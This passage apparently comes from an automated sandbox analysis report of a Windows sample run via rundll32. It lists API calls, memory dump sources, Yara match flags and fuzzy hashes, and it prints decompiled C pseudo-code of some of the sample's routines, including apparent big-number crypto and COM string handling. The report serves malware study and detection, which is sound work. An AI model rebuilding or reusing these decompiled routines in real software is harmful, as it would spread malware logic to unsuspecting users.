                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B77A7C
                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,05B6E448,?), ref: 05B77A99
                          • lstrlenW.KERNEL32(00000000,?,?,05B6E448,?), ref: 05B77AA5
                          • HeapFree.KERNEL32(00000000,00000000,?,?,05B6E448,?), ref: 05B77AB9
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                          • String ID:
                          • API String ID: 3403466626-0
                          • Opcode ID: 2ba0630c1a54cc054586ff56b5e47d0c1f45a9b392f0d8b022fac6f2d16570c2
                          • Instruction ID: 0cb3a4aba293f937ac90f1c26534f0422daa534cad6287db6e84a1b528e186ca
                          • Opcode Fuzzy Hash: 2ba0630c1a54cc054586ff56b5e47d0c1f45a9b392f0d8b022fac6f2d16570c2
                          • Instruction Fuzzy Hash: 82018072111204BFD7119B98DC45FBA7BAEFF09314F101055F6059B150CF74B904DBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleA.KERNEL32 ref: 05B6F4BF
                          • GetModuleHandleA.KERNEL32 ref: 05B6F4CD
                          • LoadLibraryExW.KERNEL32(?,?,?), ref: 05B6F4DA
                          • GetModuleHandleA.KERNEL32 ref: 05B6F4F1
                          • GetModuleHandleA.KERNEL32 ref: 05B6F4FD
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HandleModule$LibraryLoad
                          • String ID:
                          • API String ID: 1178273743-0
                          • Opcode ID: 061190c3deeffd94cd258aebc02aeacadbfcff2110c3bf8353ce8a3487694c84
                          • Instruction ID: 6eb3ea12febd02d98ffc0e1da1b8c6b92993e31a4158ee9e132c720b266cfeb8
                          • Opcode Fuzzy Hash: 061190c3deeffd94cd258aebc02aeacadbfcff2110c3bf8353ce8a3487694c84
                          • Instruction Fuzzy Hash: C001463121420AABDF056F69EC81D7A3FAAFF442617041066F91582164EF75FC21DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,05B6396C), ref: 05B7BDCC
                          • StrTrimA.SHLWAPI(00000001,?,?,05B6396C), ref: 05B7BDEF
                          • StrTrimA.SHLWAPI(00000000,?,?,05B6396C), ref: 05B7BDFE
                          • _strupr.NTDLL ref: 05B7BE01
                          • lstrlen.KERNEL32(00000000,05B6396C), ref: 05B7BE09
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Trim$_struprlstrlen
                          • String ID:
                          • API String ID: 2280331511-0
                          • Opcode ID: f091f8226de7edc5b7b78c57745274c04909311931d8fe7d4e0810d05d707e9e
                          • Instruction ID: 7360fefaf5f12d0f7047998ed751107d021b7ff60fca99aa99549169e3a544e0
                          • Opcode Fuzzy Hash: f091f8226de7edc5b7b78c57745274c04909311931d8fe7d4e0810d05d707e9e
                          • Instruction Fuzzy Hash: 33F062713100156FD715AB64EC9AE7B7BEEEB46665B10104AF509C7280EF24BC02C761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B81664
                          • RtlLeaveCriticalSection.NTDLL(05B8A400), ref: 05B81675
                          • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,05B74B8B,?,?,05B8A428,05B625BA,00000003), ref: 05B8168C
                          • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,05B74B8B,?,?,05B8A428,05B625BA,00000003), ref: 05B816A6
                          • GetLastError.KERNEL32(?,?,05B74B8B,?,?,05B8A428,05B625BA,00000003), ref: 05B816B3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                          • String ID:
                          • API String ID: 653387826-0
                          • Opcode ID: 175b02b3b17b67ab37735be4f1e3cf54cd4a859ccf5fb8c66b56ec36a70e481d
                          • Instruction ID: 507e209e8fd537bf7cb1ee755122cf0cd96041430b11a3e570c596c2d752aef8
                          • Opcode Fuzzy Hash: 175b02b3b17b67ab37735be4f1e3cf54cd4a859ccf5fb8c66b56ec36a70e481d
                          • Instruction Fuzzy Hash: B5018F75200204AFD720AF64CC05E7ABBBAFF84620B248159FA5693390DB70F902DF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05B72397,?), ref: 05B70820
                          • GetVersion.KERNEL32 ref: 05B7082F
                          • GetCurrentProcessId.KERNEL32 ref: 05B7084B
                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 05B70868
                          • GetLastError.KERNEL32 ref: 05B70887
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                          • String ID:
                          • API String ID: 2270775618-0
                          • Opcode ID: b4ca883db49286165b31e7ba9ef54517119cb72635d2741ecc5390a05b2ebb5c
                          • Instruction ID: 7acaed26d3670ecd62eb638d6ce1d057be5d883e940aebbabeb68904803b3946
                          • Opcode Fuzzy Hash: b4ca883db49286165b31e7ba9ef54517119cb72635d2741ecc5390a05b2ebb5c
                          • Instruction Fuzzy Hash: A1F04670674309AAE724BB60A84BB353F63BB05B21FA02117F626DB1C0DB70B080CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 05B689FB
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 05B68A0B
                          • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 05B68A14
                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,05B72F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 05B68A32
                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,05B72F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 05B68A3F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                          • String ID:
                          • API String ID: 3667519916-0
                          • Opcode ID: 6ee78ab78b61ddba6833d54943745b295d7477f74e0e628f603f6eadeb86ae70
                          • Instruction ID: 1d746712d7f0362eb187dc19b419fd4d3dd6b6992b02db8b0e756f2445fc54d8
                          • Opcode Fuzzy Hash: 6ee78ab78b61ddba6833d54943745b295d7477f74e0e628f603f6eadeb86ae70
                          • Instruction Fuzzy Hash: 59F03A36204704AFDB316A75DC49B2ABAE9FF44651F204669F952A25D0CB28F805CA60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 05B7C4A8
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • wsprintfA.USER32 ref: 05B7C4D9
                            • Part of subcall function 05B6AAAF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,05B6A1A1), ref: 05B6AAC5
                            • Part of subcall function 05B6AAAF: wsprintfA.USER32 ref: 05B6AAED
                            • Part of subcall function 05B6AAAF: lstrlen.KERNEL32(?), ref: 05B6AAFC
                            • Part of subcall function 05B6AAAF: wsprintfA.USER32 ref: 05B6AB3C
                            • Part of subcall function 05B6AAAF: wsprintfA.USER32 ref: 05B6AB71
                            • Part of subcall function 05B6AAAF: memcpy.NTDLL(00000000,?,?), ref: 05B6AB7E
                            • Part of subcall function 05B6AAAF: memcpy.NTDLL(00000008,05B853E8,00000002,00000000,?,?), ref: 05B6AB93
                            • Part of subcall function 05B6AAAF: wsprintfA.USER32 ref: 05B6ABB6
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 05B7C54E
                            • Part of subcall function 05B82968: RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B8297E
                            • Part of subcall function 05B82968: RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B82999
                          • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 05B7C538
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 05B7C544
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                          • String ID:
                          • API String ID: 3553201432-0
                          • Opcode ID: 49920cf3b2c48a7c721d6a564c45168f8a1e0f80fcaa15eaf2ff470d47e8e0e4
                          • Instruction ID: aa032d5620fc40e3df9e5574808ef33908c8c30ed96ba66e91b5bc32454e4cd1
                          • Opcode Fuzzy Hash: 49920cf3b2c48a7c721d6a564c45168f8a1e0f80fcaa15eaf2ff470d47e8e0e4
                          • Instruction Fuzzy Hash: 7021D876900149AFCF11DFA9DD89CAF7FBAFB48310B00545AF915A7110E771EA24DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6EFBC
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6EFCD
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6EFE5
                          • CloseHandle.KERNEL32(?), ref: 05B6EFFF
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6F014
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap$CloseHandle
                          • String ID:
                          • API String ID: 1910495013-0
                          • Opcode ID: 7334238cf755a923433aab28d3d9b3d8c9cc884406c2561b94ce9ba6ab15ceab
                          • Instruction ID: ba30ef7fe418666be7a866aa14a649e355179e982699cb590236c724632a3871
                          • Opcode Fuzzy Hash: 7334238cf755a923433aab28d3d9b3d8c9cc884406c2561b94ce9ba6ab15ceab
                          • Instruction Fuzzy Hash: 5A212975205922AFD7219F65DC88C2AFBAAFF49B103540494F40AD3654CB35FCA1DBD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B6EC00: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 05B6EC1B
                            • Part of subcall function 05B6EC00: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 05B6EC69
                            • Part of subcall function 05B6EC00: GetProcAddress.KERNEL32(00000000,?), ref: 05B6EC82
                            • Part of subcall function 05B6EC00: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 05B6ECD3
                          • GetLastError.KERNEL32(?,?,00000001), ref: 05B7987C
                          • FreeLibrary.KERNEL32(?,?,00000001), ref: 05B798E4
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                          • String ID:
                          • API String ID: 1730969706-0
                          • Opcode ID: bbb7b56c265ebfa79fd91d13c5eba9e61768153dc116e37477f6843c1dbab7d2
                          • Instruction ID: f8b384f39b8bdc4309481c3a132aa5abcc09421e5c6785e21f26b226fe66a64e
                          • Opcode Fuzzy Hash: bbb7b56c265ebfa79fd91d13c5eba9e61768153dc116e37477f6843c1dbab7d2
                          • Instruction Fuzzy Hash: DE71D675E0020DEFCF10DFE5C8889AEBBB9FF48354B1485A9E526AB251D731A941CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			E01002732(intOrPtr* __eax) {
                          				void* _v8;
                          				WCHAR* _v12;
                          				void* _v16;
                          				char _v20;
                          				void* _v24;
                          				intOrPtr _v28;
                          				void* _v32;
                          				intOrPtr _v40;
                          				short _v48;
                          				intOrPtr _v56;
                          				short _v64;
                          				intOrPtr* _t54;
                          				intOrPtr* _t56;
                          				intOrPtr _t57;
                          				intOrPtr* _t58;
                          				intOrPtr* _t60;
                          				void* _t61;
                          				intOrPtr* _t63;
                          				intOrPtr* _t65;
                          				short _t67;
                          				intOrPtr* _t68;
                          				intOrPtr* _t70;
                          				intOrPtr* _t72;
                          				intOrPtr* _t75;
                          				intOrPtr* _t77;
                          				intOrPtr _t79;
                          				intOrPtr* _t83;
                          				intOrPtr* _t87;
                          				intOrPtr _t103;
                          				intOrPtr _t109;
                          				void* _t118;
                          				void* _t122;
                          				void* _t123;
                          				intOrPtr _t130;
                          
                          				_t123 = _t122 - 0x3c;
                          				_push( &_v8);
                          				_push(__eax);
                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                          				if(_t118 >= 0) {
                          					_t54 = _v8;
                          					_t103 =  *0x100a348; // 0x428d5a8
                          					_t5 = _t103 + 0x100b038; // 0x3050f485
                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                          					_t56 = _v8;
                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                          					if(_t118 >= 0) {
                          						__imp__#2(0x1009290);
                          						_v28 = _t57;
                          						if(_t57 == 0) {
                          							_t118 = 0x8007000e;
                          						} else {
                          							_t60 = _v32;
                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                          							_t87 = __imp__#6;
                          							_t118 = _t61;
                          							if(_t118 >= 0) {
                          								_t63 = _v24;
                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                          								if(_t118 >= 0) {
                          									_t130 = _v20;
                          									if(_t130 != 0) {
                          										_t67 = 3;
                          										_v64 = _t67;
                          										_v48 = _t67;
                          										_v56 = 0;
                          										_v40 = 0;
                          										if(_t130 > 0) {
                          											while(1) {
                          												_t68 = _v24;
                          												asm("movsd");
                          												asm("movsd");
                          												asm("movsd");
                          												asm("movsd");
                          												_t123 = _t123;
                          												asm("movsd");
                          												asm("movsd");
                          												asm("movsd");
                          												asm("movsd");
                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                          												if(_t118 < 0) {
                          													goto L16;
                          												}
                          												_t70 = _v8;
                          												_t109 =  *0x100a348; // 0x428d5a8
                          												_t28 = _t109 + 0x100b0bc; // 0x3050f1ff
                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                          												if(_t118 >= 0) {
                          													_t75 = _v16;
                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                          													if(_t118 >= 0 && _v12 != 0) {
                          														_t79 =  *0x100a348; // 0x428d5a8
                          														_t33 = _t79 + 0x100b078; // 0x76006f
                          														if(lstrcmpW(_v12, _t33) == 0) {
                          															_t83 = _v16;
                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                          														}
                          														 *_t87(_v12);
                          													}
                          													_t77 = _v16;
                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                          												}
                          												_t72 = _v8;
                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                          												_v40 = _v40 + 1;
                          												if(_v40 < _v20) {
                          													continue;
                          												}
                          												goto L16;
                          											}
                          										}
                          									}
                          								}
                          								L16:
                          								_t65 = _v24;
                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                          							}
                          							 *_t87(_v28);
                          						}
                          						_t58 = _v32;
                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                          					}
                          				}
                          				return _t118;
                          			}

                          APIs
                          • SysAllocString.OLEAUT32(01009290), ref: 01002782
                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 01002863
                          • SysFreeString.OLEAUT32(00000000), ref: 0100287C
                          • SysFreeString.OLEAUT32(?), ref: 010028AB
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$Free$Alloclstrcmp
                          • String ID:
                          • API String ID: 1885612795-0
                          • Opcode ID: d03f0f81ea414d61c1dbfb73d3a3acde04e0dde40935306c2a5ea785d3bce501
                          • Instruction ID: 669f05aa535099a8c725edfdb7d4f57254387ffc12ccae15616cd997b05c2fb1
                          • Opcode Fuzzy Hash: d03f0f81ea414d61c1dbfb73d3a3acde04e0dde40935306c2a5ea785d3bce501
                          • Instruction Fuzzy Hash: 6B514D75D0060AEFDB12DFA8C4889EEB7B5EF88704F148598F915EB254D731AE41CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 01005BD8
                          • SysFreeString.OLEAUT32(00000000), ref: 01005CBD
                            • Part of subcall function 01002732: SysAllocString.OLEAUT32(01009290), ref: 01002782
                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 01005D10
                          • SysFreeString.OLEAUT32(00000000), ref: 01005D1F
                            • Part of subcall function 01003A62: Sleep.KERNEL32(000001F4), ref: 01003AAA
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                          • String ID:
                          • API String ID: 3193056040-0
                          • Opcode ID: 820053f1dea4751c9db843175ea27d60f25049e190378020738d0edd92380371
                          • Instruction ID: 45e5d09de83de8fc158be64d670bfb62901204938deef16c2c39fdccc66541e0
                          • Opcode Fuzzy Hash: 820053f1dea4751c9db843175ea27d60f25049e190378020738d0edd92380371
                          • Instruction Fuzzy Hash: 92516035500609AFEB12DFA8D844ADEB7B6FF88700F148469E985DB254DB31ED06CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,05B7DD27,00000000,0000EA60,00000000,00000000,00000000,?,05B6DBAC,?,?), ref: 05B82E89
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • ResetEvent.KERNEL32(?,?,?,?,05B7DD27,00000000,0000EA60,00000000,00000000,00000000,?,05B6DBAC,?,?,00000000,05B63EC6), ref: 05B82F00
                          • GetLastError.KERNEL32(?,?,?,05B7DD27,00000000,0000EA60,00000000,00000000,00000000,?,05B6DBAC,?,?,00000000,05B63EC6,?), ref: 05B82F2D
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          • GetLastError.KERNEL32(?,?,?,05B7DD27,00000000,0000EA60,00000000,00000000,00000000,?,05B6DBAC,?,?,00000000,05B63EC6,?), ref: 05B82FEF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                          • String ID:
                          • API String ID: 943265810-0
                          • Opcode ID: 96ea7dd3ede0d9ddd0f2dc6b38f0f635f2555e9957c88128a8cc75788aa954b7
                          • Instruction ID: 9410b3361353d41eada51cd2af8f1163f79e2f1faddc00e2364614402e7a2ee8
                          • Opcode Fuzzy Hash: 96ea7dd3ede0d9ddd0f2dc6b38f0f635f2555e9957c88128a8cc75788aa954b7
                          • Instruction Fuzzy Hash: 66415F75510604BFEB21AFA0CC89EBBBBADFB04701B145969F502D6190EB70F944DA60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 05B74E5C
                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 05B74E72
                          • memset.NTDLL ref: 05B74F1B
                          • memset.NTDLL ref: 05B74F31
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset$_allmul_aulldiv
                          • String ID:
                          • API String ID: 3041852380-0
                          • Opcode ID: 879862c278153baa01bb6063999e50934399c6c9eae736a93c32b5eb3803fe54
                          • Instruction ID: 4abc3a6ccdcf6f177ca50502442485b4d5f062a94664203970fec7fc90582876
                          • Opcode Fuzzy Hash: 879862c278153baa01bb6063999e50934399c6c9eae736a93c32b5eb3803fe54
                          • Instruction Fuzzy Hash: 31417F31B00219AFDF149E68DC85FEE77A9EF45720F0045A9F82AA7280DB70BE45CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E01001DE3(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				signed int _v16;
                          				void _v156;
                          				void _v428;
                          				void* _t55;
                          				unsigned int _t56;
                          				signed int _t66;
                          				signed int _t74;
                          				void* _t76;
                          				signed int _t79;
                          				void* _t81;
                          				void* _t92;
                          				void* _t96;
                          				signed int* _t99;
                          				signed int _t101;
                          				signed int _t103;
                          				void* _t107;
                          
                          				_t92 = _a12;
                          				_t101 = __eax;
                          				_t55 = E01002FAB(_a16, _t92);
                          				_t79 = _t55;
                          				if(_t79 == 0) {
                          					L18:
                          					return _t55;
                          				}
                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                          				_t81 = 0;
                          				_t96 = 0x20;
                          				if(_t56 == 0) {
                          					L4:
                          					_t97 = _t96 - _t81;
                          					_v12 = _t96 - _t81;
                          					E01001CC1(_t79,  &_v428);
                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E01002920(_t101,  &_v428, _a8, _t96 - _t81);
                          					E01002920(_t79,  &_v156, _a12, _t97);
                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                          					_t66 = E01001CC1(_t101,  &E0100A1D0);
                          					_t103 = _t101 - _t79;
                          					_a8 = _t103;
                          					if(_t103 < 0) {
                          						L17:
                          						E01001CC1(_a16, _a4);
                          						E01003ADA(_t79,  &_v428, _a4, _t97);
                          						memset( &_v428, 0, 0x10c);
                          						_t55 = memset( &_v156, 0, 0x84);
                          						goto L18;
                          					}
                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                          					do {
                          						if(_v8 != 0xffffffff) {
                          							_push(1);
                          							_push(0);
                          							_push(0);
                          							_push( *_t99);
                          							L0100824A();
                          							_t74 = _t66 +  *(_t99 - 4);
                          							asm("adc edx, esi");
                          							_push(0);
                          							_push(_v8 + 1);
                          							_push(_t92);
                          							_push(_t74);
                          							L01008244();
                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                          								_t74 = _t74 | 0xffffffff;
                          								_v16 = _v16 & 0x00000000;
                          							}
                          						} else {
                          							_t74 =  *_t99;
                          						}
                          						_t106 = _t107 + _a8 * 4 - 0x1a8;
                          						_a12 = _t74;
                          						_t76 = E0100241B(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                          						while(1) {
                          							 *_t99 =  *_t99 - _t76;
                          							if( *_t99 != 0) {
                          								goto L14;
                          							}
                          							L13:
                          							_t92 =  &_v156;
                          							if(E01002378(_t79, _t92, _t106) < 0) {
                          								break;
                          							}
                          							L14:
                          							_a12 = _a12 + 1;
                          							_t76 = E010079CC(_t79,  &_v156, _t106, _t106);
                          							 *_t99 =  *_t99 - _t76;
                          							if( *_t99 != 0) {
                          								goto L14;
                          							}
                          							goto L13;
                          						}
                          						_a8 = _a8 - 1;
                          						_t66 = _a12;
                          						_t99 = _t99 - 4;
                          						 *(_a8 * 4 +  &E0100A1D0) = _t66;
                          					} while (_a8 >= 0);
                          					_t97 = _v12;
                          					goto L17;
                          				}
                          				while(_t81 < _t96) {
                          					_t81 = _t81 + 1;
                          					_t56 = _t56 >> 1;
                          					if(_t56 != 0) {
                          						continue;
                          					}
                          					goto L4;
                          				}
                          				goto L4;
                          			}

                          0x01001de6
                          0x01001df2
                          0x01001df8
                          0x01001dfd
                          0x01001e01
                          0x01001f73
                          0x01001f77
                          0x01001f77
                          0x01001e07
                          0x01001e0b
                          0x01001e0f
                          0x01001e12
                          0x01001e1d
                          0x01001e23
                          0x01001e28
                          0x01001e2b
                          0x01001e45
                          0x01001e54
                          0x01001e60
                          0x01001e6a
                          0x01001e6f
                          0x01001e71
                          0x01001e74
                          0x01001f2b
                          0x01001f31
                          0x01001f42
                          0x01001f55
                          0x01001f6b
                          0x00000000
                          0x01001f70
                          0x01001e7d
                          0x01001e84
                          0x01001e88
                          0x01001e8e
                          0x01001e90
                          0x01001e92
                          0x01001e94
                          0x01001e96
                          0x01001ea0
                          0x01001ea5
                          0x01001ea7
                          0x01001ea9
                          0x01001eaa
                          0x01001eab
                          0x01001eac
                          0x01001eb3
                          0x01001eba
                          0x01001ebd
                          0x01001ebd
                          0x01001e8a
                          0x01001e8a
                          0x01001e8a
                          0x01001ec5
                          0x01001ecd
                          0x01001ed9
                          0x01001ede
                          0x01001ede
                          0x01001ee3
                          0x00000000
                          0x00000000
                          0x01001ee5
                          0x01001ee8
                          0x01001ef5
                          0x00000000
                          0x00000000
                          0x01001ef7
                          0x01001ef7
                          0x01001f04
                          0x01001ede
                          0x01001ee3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01001ee3
                          0x01001f0e
                          0x01001f11
                          0x01001f14
                          0x01001f1b
                          0x01001f1b
                          0x01001f28
                          0x00000000
                          0x01001f28
                          0x01001e14
                          0x01001e18
                          0x01001e19
                          0x01001e1b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01001e1b
                          0x00000000

                          APIs
                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 01001E96
                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 01001EAC
                          • memset.NTDLL ref: 01001F55
                          • memset.NTDLL ref: 01001F6B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: memset$_allmul_aulldiv
                          • String ID:
                          • API String ID: 3041852380-0
